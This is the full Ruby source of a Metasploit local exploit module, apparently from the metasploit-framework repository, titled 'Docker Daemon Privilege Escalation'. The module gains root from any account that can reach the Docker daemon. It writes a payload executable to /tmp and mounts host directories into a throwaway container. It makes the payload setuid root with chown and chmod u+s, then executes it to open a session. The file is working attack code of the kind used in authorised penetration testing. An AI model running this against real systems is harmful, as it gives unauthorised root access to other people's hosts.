metasploit-framework/modules/exploits/linux/local/docker_daemon_privilege_esc...

76 lines
2.4 KiB
Ruby

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
require 'msf/core/exploit/exe'
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Exploit::EXE
include Msf::Post::File
def initialize(info={})
super(update_info(info, {
'Name' => 'Docker Daemon Privilege Escalation',
'Description' => %q{
This module obtains root privileges from any host account with access to the
Docker daemon. Usually this includes accounts in the `docker` group.
},
'License' => MSF_LICENSE,
'Author' => ['forzoni'],
'DisclosureDate' => 'Jun 28 2016',
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X86_64],
'Targets' => [ ['Automatic', {}] ],
'SessionTypes' => ['shell', 'meterpreter']
}
))
register_options([
OptInt.new("ListenerTimeout", [true, "Number of seconds to wait for the exploit", 60]),
OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])
], self.class)
end
def check
if cmd_exec("sh -c 'docker ps; echo $?'").strip =~ /1$/
print_error("Failed to access Docker daemon.")
Exploit::CheckCode::Safe
else
Exploit::CheckCode::Vulnerable
end
end
def exploit
pl = generate_payload_exe
exe_file = "#{datastore['WritableDir']}/#{rand_text_alpha(3 + rand(5))}.elf"
print_status("Writing payload executable to '#{exe_file}'")
write_file(exe_file, pl)
cmd_exec("chmod +x #{exe_file}")
vprint_status shell_script(exe_file)
vprint_status cmd_exec("sh -c '#{shell_script(exe_file)}'")
stime = Time.now.to_f
print_status "Starting the payload handler..."
until session_created? || stime + datastore['ListenerTimeout'] < Time.now.to_f
Rex.sleep(1)
end
end
def shell_script(exploit_path)
deps = %w(/bin /lib /lib64 /etc /usr /opt) + [datastore['WritableDir']]
dep_options = deps.uniq.map { |dep| "-v #{dep}:#{dep}" }.join(" ")
%Q{
IMG=`echo "FROM scratch\\nCMD a" | docker build -q - | cut -d ":" -f2`
EXPLOIT="chown 0:0 #{exploit_path}; chmod u+s #{exploit_path}"
docker run #{dep_options} $IMG /bin/sh -c "$EXPLOIT"
docker rmi $IMG
#{exploit_path}
}.strip.split("\n").map(&:strip).join(';')
end
end